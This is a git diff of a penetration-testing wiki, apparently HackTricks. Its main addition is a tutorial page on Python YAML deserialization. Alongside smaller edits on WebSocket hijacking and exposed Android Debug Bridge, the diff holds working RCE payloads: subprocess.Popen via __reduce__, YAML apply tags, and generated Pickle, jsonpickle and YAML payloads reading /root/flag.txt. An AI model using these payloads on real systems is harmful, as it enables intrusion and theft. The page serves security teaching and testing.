diff --git a/.gitbook/assets/image (628) (1) (1).png b/.gitbook/assets/image (628) (1) (1).png new file mode 100644 index 00000000..e146bcdd Binary files /dev/null and b/.gitbook/assets/image (628) (1) (1).png differ diff --git a/.gitbook/assets/image (628) (1).png b/.gitbook/assets/image (628) (1).png index e146bcdd..cfef5b39 100644 Binary files a/.gitbook/assets/image (628) (1).png and b/.gitbook/assets/image (628) (1).png differ diff --git a/.gitbook/assets/image (628).png b/.gitbook/assets/image (628).png index cfef5b39..40977981 100644 Binary files a/.gitbook/assets/image (628).png and b/.gitbook/assets/image (628).png differ diff --git a/SUMMARY.md b/SUMMARY.md index 53d3b052..94ae6cbd 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -388,6 +388,7 @@ * [Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)](pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md) * [Exploiting \_\_VIEWSTATE knowing the secrets](pentesting-web/deserialization/exploiting-\_\_viewstate-knowing-the-secret.md) * [Exploiting \_\_VIEWSTATE without knowing the secrets](pentesting-web/deserialization/exploiting-\_\_viewstate-parameter.md) + * [Python Yaml Deserialization](pentesting-web/deserialization/python-yaml-deserialization.md) * [Domain/Subdomain takeover](pentesting-web/domain-subdomain-takeover.md) * [Email Header Injection](pentesting-web/email-header-injection.md) * [File Inclusion/Path traversal](pentesting-web/file-inclusion/README.md) diff --git a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md b/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md index 058f4bfc..0643f3cb 100644 --- a/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md +++ b/cloud-security/gcp-security/gcp-buckets-brute-force-and-privilege-escalation.md @@ -17,7 +17,7 @@ Note that other cloud resources could be searched for and that some times these As other clouds, GCP also offers Buckets to its users. These buckets might be (to list the content, read, write...). -![](<../../.gitbook/assets/image (628) (1).png>) +![](<../../.gitbook/assets/image (628) (1) (1).png>) The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names: diff --git a/pentesting-web/cross-site-websocket-hijacking-cswsh.md b/pentesting-web/cross-site-websocket-hijacking-cswsh.md index 8721cdee..52f056f2 100644 --- a/pentesting-web/cross-site-websocket-hijacking-cswsh.md +++ b/pentesting-web/cross-site-websocket-hijacking-cswsh.md @@ -83,7 +83,9 @@ An attacker can create a **malicious web page** on their own domain which **esta ### Simple Attack -This attack allows you to make the client connect to websocket server and send some predefined value. +Note that when **establishing** a **websocket** connection the **cookie** is **sent** to the server. The **server** might be using it to **relate** each **specific** **user** with his **websocket** **session based on the sent cookie**. + +Then, if for **example** the **websocket** **server** **sends back the history of the conversation** of a user if a msg with "**READY"** is sent, then a **simple XSS** establishing the connection (the **cookie** will be **sent** **automatically** to authorise the victim user) **sending** "**READY**" will be able to **retrieve** the history of the **conversation**.: ```markup ``` -Usually this will be useless as what you want is to get the information the real user is sending and the responses. - ### Stealing data from user Copy the web application you want to impersonate (the .html files for example) and inside the script where the websocket communication is occurring add this code: diff --git a/pentesting-web/deserialization/README.md b/pentesting-web/deserialization/README.md index 39e1934c..517946d9 100644 --- a/pentesting-web/deserialization/README.md +++ b/pentesting-web/deserialization/README.md @@ -130,6 +130,14 @@ For more information about escaping from **pickle jails** check: [bypass-python-sandboxes](../../misc/basic-python/bypass-python-sandboxes/) {% endcontent-ref %} +### Yaml** & **jsonpickle + +The following page present the technique to **abuse an unsafe deserialization in yamls** python libraries and finishes with a tool that can be used to generate RCE deserialization payload for **Pickle, PyYAML, jsonpickle and ruamel.yaml**: + +{% content-ref url="python-yaml-deserialization.md" %} +[python-yaml-deserialization.md](python-yaml-deserialization.md) +{% endcontent-ref %} + ## NodeJS ### `__proto__` and `prototype` pollution diff --git a/pentesting-web/deserialization/python-yaml-deserialization.md b/pentesting-web/deserialization/python-yaml-deserialization.md new file mode 100644 index 00000000..ed61b549 --- /dev/null +++ b/pentesting-web/deserialization/python-yaml-deserialization.md @@ -0,0 +1,123 @@ +# Python Yaml Deserialization + +## Yaml **Deserialization** + +**Yaml **python libraries is also capable to** serialize python objects** and not just raw data: + +``` +print(yaml.dump(str("lol"))) +lol +... + +print(yaml.dump(tuple("lol"))) +!!python/tuple +- l +- o +- l + +print(yaml.dump(range(1,10))) +!!python/object/apply:builtins.range +- 1 +- 10 +- 1 +``` + +Check how the **tuple** isn’t a raw type of data and therefore it was **serialized**. And the same happened with the **range** (taken from the builtins). + +![](<../../.gitbook/assets/image (628).png>) + +**safe\_load()** or **safe\_load\_all()** uses SafeLoader and **don’t support class object deserialization**. Class object deserialization example: + +```python +import yaml +from yaml import UnsafeLoader, FullLoader, Loader +data = b'!!python/object/apply:builtins.range [1, 10, 1]' + +print(yaml.load(data, Loader=UnsafeLoader)) #range(1, 10) +print(yaml.load(data, Loader=Loader)) #range(1, 10) +print(yaml.load_all(data)) # +print(yaml.load_all(data, Loader=Loader)) # +print(yaml.load_all(data, Loader=UnsafeLoader)) # +print(yaml.load_all(data, Loader=FullLoader)) # +print(yaml.unsafe_load(data)) #range(1, 10) +print(yaml.full_load_all(data)) # +print(yaml.unsafe_load_all(data)) # + +#The other ways to load data will through an error as they won't even attempt to +#deserialize the python object +``` + +The previous code used **unsafe\_load **to load the serialized python class. This is because in **version >= 5.1**, it doesn’t allow to **deserialize any serialized python class or class attribute**, with Loader not specified in load() or Loader=SafeLoader. + +### Basic Exploit + +Example on how to **execute a sleep**: + +```python +import yaml +from yaml import UnsafeLoader, FullLoader, Loader +data = b'!!python/object/apply:time.sleep [2]' +print(yaml.load(data, Loader=UnsafeLoader)) #Executed +print(yaml.load(data, Loader=Loader)) #Executed +print(yaml.load_all(data)) +print(yaml.load_all(data, Loader=Loader)) +print(yaml.load_all(data, Loader=UnsafeLoader)) +print(yaml.load_all(data, Loader=FullLoader)) +print(yaml.unsafe_load(data)) #Executed +print(yaml.full_load_all(data)) +print(yaml.unsafe_load_all(data)) +``` + +## RCE + +Kindly note payload creation can be done with **any python YAML module (PyYAML or ruamel.yaml), in the same way**. The same payload can exploit both YAML module or any module based on PyYAML or ruamel.yaml + +```python +import yaml +from yaml import UnsafeLoader, FullLoader, Loader +import subprocess + +class Payload(object): + def __reduce__(self): + return (subprocess.Popen,('ls',)) + +deserialized_data = yaml.dump(Payload()) # serializing data +print(deserialized_data) + +#!!python/object/apply:subprocess.Popen +#- ls + +print(yaml.load(deserialized_data, Loader=UnsafeLoader)) +print(yaml.load(deserialized_data, Loader=Loader)) +print(yaml.unsafe_load(deserialized_data)) +``` + +### Tool to create Payloads + +The tool [https://github.com/j0lt-github/python-deserialization-attack-payload-generator](https://github.com/j0lt-github/python-deserialization-attack-payload-generator) can be used to generate python deserialization payloads to abuse **Pickle, PyYAML, jsonpickle and ruamel.yaml:** + +```bash +python3 peas.py +Enter RCE command :cat /root/flag.txt +Enter operating system of target [linux/windows] . Default is linux :linux +Want to base64 encode payload ? [N/y] : +Enter File location and name to save :/tmp/example +Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All +Done Saving file !!!! + +cat /tmp/example_jspick +{"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]} + +cat /tmp/example_pick | base64 -w0 +gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg== + +cat /tmp/example_yaml +!!python/object/apply:subprocess.Popen +- !!python/tuple + - cat + - /root/flag.txt +``` + +## References + +For more in depth information about this technique read: [https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf](https://www.exploit-db.com/docs/english/47655-yaml-deserialization-attack-in-python.pdf) diff --git a/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md b/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md index e8702cb5..819939ea 100644 --- a/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md +++ b/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md @@ -92,7 +92,7 @@ There could be another problem, if the **response** to the legit request **conta However, the **HEAD** request **doesn't contain a body** but it usually **contains** the **Content-Length** as if the request was a GET request. Therefore, sending a **HEAD** request **instead of a POST** request you can **read the HEAD Content-Length** bytes of the smuggled request response. -![](<../../.gitbook/assets/image (628).png>) +![](<../../.gitbook/assets/image (628) (1).png>) ### Leaking Internal Headers via Tunneling diff --git a/pentesting/5555-android-debug-bridge.md b/pentesting/5555-android-debug-bridge.md index 580dd5fe..aa3e780b 100644 --- a/pentesting/5555-android-debug-bridge.md +++ b/pentesting/5555-android-debug-bridge.md @@ -39,3 +39,7 @@ adb pull "/sdcard/com.package" ``` You can use this trick to **retrieve sensitive information like chrome passwords**. For more info about this check the information a references provided [**here**](https://github.com/carlospolop/hacktricks/issues/274). + +## Shodan + +* `android debug bridge`